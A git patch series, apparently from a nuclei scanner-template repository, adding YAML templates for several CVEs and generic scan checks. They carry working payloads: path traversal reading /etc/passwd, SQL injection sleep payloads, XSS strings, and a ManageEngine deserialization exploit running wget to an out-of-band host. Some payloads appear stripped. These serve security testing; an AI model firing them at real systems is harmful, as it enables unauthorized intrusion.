From 18be56ef059d9c84e6de8f1b1fde393d01c48c20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?C=C3=A9sar=20Calder=C3=B3n?= Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0001/1841] Added template for CVE-2024-36527 --- CVE-2024-36527.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 CVE-2024-36527.yaml diff --git a/CVE-2024-36527.yaml b/CVE-2024-36527.yaml new file mode 100644 index 0000000000..e97c831e96 --- /dev/null +++ b/CVE-2024-36527.yaml @@ -0,0 +1,26 @@ +id: CVE-2024-36527 + +info: + name: Puppeteer-renderer Directory Traversal + author: Stux + severity: medium + description: | + puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server. + reference: + - https://github.com/zenato/puppeteer-renderer/issues/97 + metadata: + max-request: 1 + tags: cve,cve2024,puppeteer-renderer + +http: + - method: GET + path: + - "{{BaseURL}}/html?url=file:///etc/passwd" + + matchers: + - type: word + words: + - "root:x" + - "/bin/bash" + part: body + condition: or \ No newline at end of file From b53d585dc5c9eb90d9386ecc8c201b9fd3aab652 Mon Sep 17 00:00:00 2001 From: Ashraf Harb Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 0002/1841] Added template for CVE-2022-38322 --- CVE-2022-38322.yaml | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 CVE-2022-38322.yaml diff --git a/CVE-2022-38322.yaml b/CVE-2022-38322.yaml new file mode 100644 index 0000000000..0c5e885069 --- /dev/null +++ b/CVE-2022-38322.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-38322 + +info: + name: Multiple Reflected XSS in Temenos Transact (Previously T24) + author: qotoz + severity: high + tags: xss, transact, t24 , temenos + reference: + - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/ + +requests: + - method: GET + path: + - "{{BaseURL}}/jsps/enqrequest.jsp?enqaction=XSS&enqname=XSS&routineArgs=XSS&skin=XSS&compId=XSS&usrRole=XSS&compScreen=XSS&contextRoot=&windowName=XSS&user=XSS&reqTabid=XSS&WS_replaceAll=XSS&WS_parentComposite=XSS&command=&formToken=" + - "{{BaseURL}}/jsps/about.jsp?skin=XSS&release=XSS" + - "{{BaseURL}}/jsps/continue.jsp?cfwstage=XSS&compId=XSS&skin=XSS&user=XSS&windowName=XSS" + - "{{BaseURL}}/jsps/customMessage.jsp?Message=XSS" + - "{{BaseURL}}/jsps/dropdown.jsp?title=XSS&routineArgs=XSS&routineName=XSS&searchCriteria=XSS&dropfield=XSS&compId=XSS&usrRole=XSS&skin=XSS&windowName=XSS&parentWin=XSS" + - "{{BaseURL}}/jsps/fileUpload.jsp?skin=XSS&trans_upload=XSS&trans_uploading=XSS&fragment=XSS" + - "{{BaseURL}}/jsps/genDocRequest.jsp?imageId=XSS&isPopUp=XSS&enqid=XSS" + - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS" + - "{{BaseURL}}/jsps/submitWindow.jsp?requestType=XSS&routineArgs=XSS&companyId=XSS&unlock=XSS&closing=XSS&pwprocessid=XSS&windowName=XSS" + - "{{BaseURL}}/jsps/svgInstall.jsp?skin=XSS" + - "{{BaseURL}}/jsps/txnrequest.jsp?usrRole=XSS&routineArgs=XSS&compId=XSS&compScreen=XSS&user=XSS&skin=XSS" + - "{{BaseURL}}/jsps/genrequest.jsp?routineName=XSS&routineArgs=XSS&skin=XSS&compId=XSS&compScreen=XSS&contextRoot=&user=XSS&formToken=" + - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS%27)%22+onerror=%22confirm(%27XSS%27)%22+test=%22" + + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" + + matchers-condition: and + matchers: + - type: word + words: + - "XSS" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 33277273797f92ff64df84bf7056c0973dedf7bc Mon Sep 17 00:00:00 2001 From: arliya Date: Fri, 17 Feb 2023 07:25:24 -0500 Subject: [PATCH 0003/1841] add templates: thinkphp6_arbitrary_write --- .../thinkphp/thinkphp6_arbitrary_write.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml diff --git a/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml b/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml new file mode 100644 index 0000000000..1428b9f909 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml @@ -0,0 +1,31 @@ +id: thinkphp6_arbitrary_write + +info: + name: ThinkPHP 6.0.0~6.0.1 - Arbitrary file write + author: arliya + severity: critical + description: ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string + reference: '' + tags: thinkphp,file-upload,rce + +variables: + random_filename: "{{to_lower(rand_base(11))}}" + +requests: + - method: GET + path: + - "{{BaseURL}}/" + headers: + Cookie: "PHPSESSID=/../../../public/{{random_filename}}.php" + Content-Type: application/x-www-form-urlencoded + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php" + - type: status + status: + - 200 + +# Enhanced by arliya on 2023/02/17 From 9b4f78e67b8717c926f6215c515235b2b6f7b678 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 22 Feb 2023 22:57:33 +0530 Subject: [PATCH 0004/1841] reference &metadata -update --- .../thinkphp/thinkphp6_arbitrary_write.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml b/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml index 1428b9f909..78b2f3ecda 100644 --- a/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml +++ b/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml @@ -1,11 +1,16 @@ -id: thinkphp6_arbitrary_write +id: thinkphp6-arbitrary-write info: name: ThinkPHP 6.0.0~6.0.1 - Arbitrary file write author: arliya severity: critical description: ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string - reference: '' + reference: | + - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591 + - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write + metadata: + verified: true + shodan-query: title:"ThinkPHP" tags: thinkphp,file-upload,rce variables: @@ -15,8 +20,8 @@ requests: - method: GET path: - "{{BaseURL}}/" - headers: - Cookie: "PHPSESSID=/../../../public/{{random_filename}}.php" + headers: + Cookie: "PHPSESSID=/../../../public/{{random_filename}}.php" Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: @@ -27,5 +32,3 @@ requests: - type: status status: - 200 - -# Enhanced by arliya on 2023/02/17 From b95666fb6c7dc4fab4f35b23306f81547d0cea0d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 24 Feb 2023 11:15:54 +0530 Subject: [PATCH 0005/1841] filename -update --- ...nkphp6_arbitrary_write.yaml => thinkphp6-arbitrary-write.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/thinkphp/{thinkphp6_arbitrary_write.yaml => thinkphp6-arbitrary-write.yaml} (100%) diff --git a/vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml similarity index 100% rename from vulnerabilities/thinkphp/thinkphp6_arbitrary_write.yaml rename to vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml From 456ed4ec416dca1649b5a460b803aeedfbc44567 Mon Sep 17 00:00:00 2001 From: yhy0 <31311038+yhy0@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:49:09 +0800 Subject: [PATCH 0006/1841] add CVE-2023-52251 --- http/cves/2023/CVE-2023-52251.yaml | 63 ++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-52251.yaml diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml new file mode 100644 index 0000000000..85d518d9f6 --- /dev/null +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-52251 + +info: + name: kafka-ui - RCE + author: yhy0 + severity: critical + description: | + Remote Code Execution vulnerability provectus/kafka-ui. + remediation: | + Do not expose to the Internet + reference: + - https://github.com/BobTheShoplifter/CVE-2023-52251-POC + - https://github.com/provectus/kafka-ui + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-score: 8.8 + cve-id: CVE-2023-52251 + metadata: + max-request: 3 + fofa-query: icon_hash="-1477045616" + verified: true + tags: cve,cve2023,rce,kafka,kafka-ui + +http: + - method: GET + path: + - "{{BaseURL}}/api/clusters" + - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC" + - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(header, "application/json")' + - 'contains(body, "status\":\"online")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(content_type, "application/json")' + - 'contains(body, "name")' + - "status_code == 200" + condition: and + + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + extractors: + - type: json + name: cluster + json: + - .[0].name + internal: true + + - type: json + name: topic + json: + - .topics[0].name + internal: true From 55b1e930ef0a77b3dc5389ebcfce0479ab9028e4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Mar 2024 15:48:27 +0530 Subject: [PATCH 0007/1841] Update CVE-2023-52251.yaml --- http/cves/2023/CVE-2023-52251.yaml | 33 ++++++++++++++++++------------ 1 file changed, 20 insertions(+), 13 deletions(-) diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 85d518d9f6..84e54aaa0b 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -1,25 +1,32 @@ id: CVE-2023-52251 info: - name: kafka-ui - RCE + name: Kafka UI 0.7.1 Command Injection author: yhy0 - severity: critical + severity: high description: | - Remote Code Execution vulnerability provectus/kafka-ui. - remediation: | - Do not expose to the Internet + An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. reference: - https://github.com/BobTheShoplifter/CVE-2023-52251-POC - https://github.com/provectus/kafka-ui + - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html + - https://github.com/nomi-sec/PoC-in-GitHub classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-52251 + cwe-id: CWE-94 + epss-score: 0.02881 + epss-percentile: 0.90497 + cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:* metadata: - max-request: 3 - fofa-query: icon_hash="-1477045616" verified: true - tags: cve,cve2023,rce,kafka,kafka-ui + max-request: 3 + vendor: provectus + product: ui + framework: kafka + fofa-query: icon_hash="-1477045616" + tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui http: - method: GET @@ -27,7 +34,7 @@ http: - "{{BaseURL}}/api/clusters" - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC" - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING" - + matchers-condition: and matchers: - type: dsl @@ -36,19 +43,19 @@ http: - 'contains(body, "status\":\"online")' - 'status_code == 200' condition: and - + - type: dsl dsl: - 'contains(content_type, "application/json")' - 'contains(body, "name")' - "status_code == 200" condition: and - + - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - + extractors: - type: json name: cluster From f17b0706bb3df7459294ab0ebd5ee821eabd48c9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Mar 2024 15:52:21 +0530 Subject: [PATCH 0008/1841] trailspace ifx --- http/cves/2023/CVE-2023-52251.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 84e54aaa0b..69b2c27b26 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -36,7 +36,7 @@ http: - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING" matchers-condition: and - matchers: + matchers: - type: dsl dsl: - 'contains(header, "application/json")' From 2d9541628e287021f533523c451f188db0e87b66 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 16 Apr 2024 03:46:46 +0300 Subject: [PATCH 0009/1841] upstyle malware detect add --- file/malware/upstyle-malware.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 file/malware/upstyle-malware.yaml diff --git a/file/malware/upstyle-malware.yaml b/file/malware/upstyle-malware.yaml new file mode 100644 index 0000000000..fab6017d8d --- /dev/null +++ b/file/malware/upstyle-malware.yaml @@ -0,0 +1,31 @@ +id: upstyle-py-malware +info: + name: Upstyle Malware - Detect + author: Kazgangap + severity: info + reference: + - https://unit42.paloaltonetworks.com/cve-2024-3400/ + - https://github.com/volexity/threat-intel/blob/main/2024/2024-04-12%20Palo%20Alto%20Networks%20GlobalProtect/indicators/rules.yar + tags: malware,cve-2024-3400 +file: + - extensions: + - "py" + + matchers: + - type: word + part: raw + words: + - "/opt/pancfg/mgmt/licenses/PA_VM" + - "exec(base64." + condition: or + + - type: word + part: raw + words: + - "signal.signal(signal.SIGTERM,stop)" + - "exec(base64." + condition: or + + - type: regex + regex: + - "write(\"/*\"+output+\"*/\")" \ No newline at end of file From 8a5bde391ba78e579a08f85a5c4344d04ff94a47 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:15:38 -0500 Subject: [PATCH 0010/1841] Create CVE-2020-10189 template --- http/cves/2020/CVE-2020-10189.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2020/CVE-2020-10189.yaml diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml new file mode 100644 index 0000000000..3d97618a66 --- /dev/null +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-10189 + +info: + name: ManageEngine Desktop Central Java Deserialization + author: king-alexander + severity: critical + remediation: Apply updates per vendor instructions. + description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 + - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html + tags: cve,cve2020,kev + +http: + - method: GET + path: + - "https://{{Host}}:8383/configurations.do" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ManageEngine Desktop Central" + + - type: dsl + dsl: + - compare_versions(version, '<10.0.474') From a58c0036b9cf44ebe205a65f72fb1a9e9d56ed49 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:25:58 -0500 Subject: [PATCH 0011/1841] Fix trailing whitespace --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 3d97618a66..51eabfb486 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -4,7 +4,7 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. + remediation: Apply updates per vendor instructions. description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 From 4be597880b258112bac1eda90bc1b5c39fbee152 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 11:51:34 -0500 Subject: [PATCH 0012/1841] Add Stage 1 Stage 1 is the arbitrary file write. This code creates a new file on the Zoho ManageEngine server with our serialized exploit, which will be executed in the next stage. --- http/cves/2020/CVE-2020-10189.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 51eabfb486..6c034ee761 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -13,6 +13,7 @@ info: tags: cve,cve2020,kev http: + # detect vulnerable version - method: GET path: - "https://{{Host}}:8383/configurations.do" @@ -38,3 +39,17 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write + - method: POST + headers: + Content-Type: application/octet-stream + path: + # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename + - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" + # generate a serialized raw bytes payload + body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' + + matchers: + - type: status + status: + - 200 From 825b9fbed4d5b80e2adc3319f702ff41fec27b99 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:13:14 -0500 Subject: [PATCH 0013/1841] Add Stage 2 Stage 2 triggers the deserialization vulnerability in `getChartImage()`. --- http/cves/2020/CVE-2020-10189.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 6c034ee761..e40388c733 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -39,6 +39,7 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write - method: POST headers: @@ -53,3 +54,19 @@ http: - type: status status: - 200 + + # deserialization + - method: POST + path: + - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "http" From 7f80f000b4fda49adcca496e4e5216e0148a78d2 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:19:31 -0500 Subject: [PATCH 0014/1841] Update description --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index e40388c733..990833f69c 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -5,7 +5,7 @@ info: author: king-alexander severity: critical remediation: Apply updates per vendor instructions. - description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html From d3087ea35f3b961e77fca2291dafc0b3dce7fcab Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:22:39 -0500 Subject: [PATCH 0015/1841] Update references I referenced Packet Storm for the logic to detect vulnerable versions and Source Incite for the proof of concept. --- http/cves/2020/CVE-2020-10189.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 990833f69c..5c7e88c67e 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -9,6 +9,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://srcincite.io/pocs/src-2020-0011.py.txt - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html tags: cve,cve2020,kev From 193435f17ebe47f0f91fa00f73cd2ca0567f2fc1 Mon Sep 17 00:00:00 2001 From: Satya Prakash Date: Fri, 3 May 2024 12:44:14 +0530 Subject: [PATCH 0016/1841] Create time-based-sqli.yaml --- .../vulnerabilities/sqli/time-based-sqli.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 dast/vulnerabilities/sqli/time-based-sqli.yaml diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml new file mode 100644 index 0000000000..16d2d75568 --- /dev/null +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -0,0 +1,33 @@ +id: time-based-sqli + +info: + name: Time-Based Blind SQL Injection + author: 0xKayala + severity: Critical + description: This Template detects time-based Blind SQL Injection vulnerability + tags: sqli,dast,time + +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "duration>=7 && duration <=16" From f9ac5caa19eb32aaf2bff3660477a93c8c115c09 Mon Sep 17 00:00:00 2001 From: Satya Prakash Date: Fri, 3 May 2024 12:47:54 +0530 Subject: [PATCH 0017/1841] Update reflected-xss.yaml --- dast/vulnerabilities/xss/reflected-xss.yaml | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index bbb658c851..8f2bef16a9 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -2,7 +2,7 @@ id: reflected-xss info: name: Reflected Cross Site Scripting - author: pdteam + author: pdteam, 0xKayala severity: medium tags: xss,rxss,dast @@ -18,6 +18,16 @@ http: payloads: reflection: - "'\"><{{first}}" + - "" + - "" + - "'>" + - "" + - "" + - "" + - "" + - "'>" + - "'\/>" + - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o" fuzzing: - part: query @@ -38,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950 From 93236e5f46e1adffa159b2c8814b3bbfa4893347 Mon Sep 17 00:00:00 2001 From: Satya Prakash Date: Fri, 3 May 2024 12:49:53 +0530 Subject: [PATCH 0018/1841] Create blind-xss.yaml --- dast/vulnerabilities/xss/blind-xss.yaml | 64 +++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 dast/vulnerabilities/xss/blind-xss.yaml diff --git a/dast/vulnerabilities/xss/blind-xss.yaml b/dast/vulnerabilities/xss/blind-xss.yaml new file mode 100644 index 0000000000..f2d6cbc306 --- /dev/null +++ b/dast/vulnerabilities/xss/blind-xss.yaml @@ -0,0 +1,64 @@ +id: blind-xss + +info: + name: Blind Cross Site Scripting + author: 0xKayala + severity: high + description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. + tags: xss,bxss,dast + +variables: + first: "{{rand_int(10000, 99999)}}" + script_payload_1: "" + script_payload_2: "\"><41707" + script_payload_3: "" + script_payload_4: "" + script_payload_5: "" + script_payload_6: "" + script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" + script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" + script_payload_9: "XX">" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + blind: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + - "{{script_payload_9}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{blind}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + - "{{script_payload_9}}" + - type: word + part: header + words: + - "text/html" From f7c6047f13b9f8b47080c7fd200f0aa7679ab072 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sat, 11 May 2024 13:48:32 +0330 Subject: [PATCH 0019/1841] Add sql server backup exposure --- http/exposures/backups/sql-server-dump.yaml | 59 +++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/exposures/backups/sql-server-dump.yaml diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml new file mode 100644 index 0000000000..2445673182 --- /dev/null +++ b/http/exposures/backups/sql-server-dump.yaml @@ -0,0 +1,59 @@ +id: default-sql-server-dump + +info: + name: SQL Server - Dump Files + author: userdehghani + severity: medium + description: A SQL Server dump file was found + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 21 + tags: exposure,backup,sql-server + +http: + - method: GET + path: + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/1.bak" + - "/sa.bak" + - "/wwwroot.bak" + - "/backup.bak" + - "/database.bak" + - "/data.bak" + - "/db_backup.bak" + - "/dbdump.bak" + - "/db.bak" + - "/dump.bak" + - "/{{Hostname}}.bak" + - "/{{Hostname}}_db.bak" + - "/localhost.bak" + - "/mysqldump.bak" + - "/mysql.bak" + - "/site.bak" + - "/sql.bak" + - "/temp.bak" + - "/translate.bak" + - "/users.bak" + - "/www.bak" + - "/wp-content/uploads/dump.bak" + - "/wp-content/mysql.bak" + + headers: + Range: "bytes=0-500" + max-size: 500 # Size in bytes - Max Size to read from server response + + matchers-condition: and + matchers: + - type: binary + regex: + - "54415045" # Microsoft Tape Format + part: body + + - type: status + status: + - 200 \ No newline at end of file From 935f507907a7f2696b528a37886dbd83bb1cf566 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Sat, 11 May 2024 13:55:21 +0330 Subject: [PATCH 0020/1841] Update sql-server-dump.yaml --- http/exposures/backups/sql-server-dump.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml index 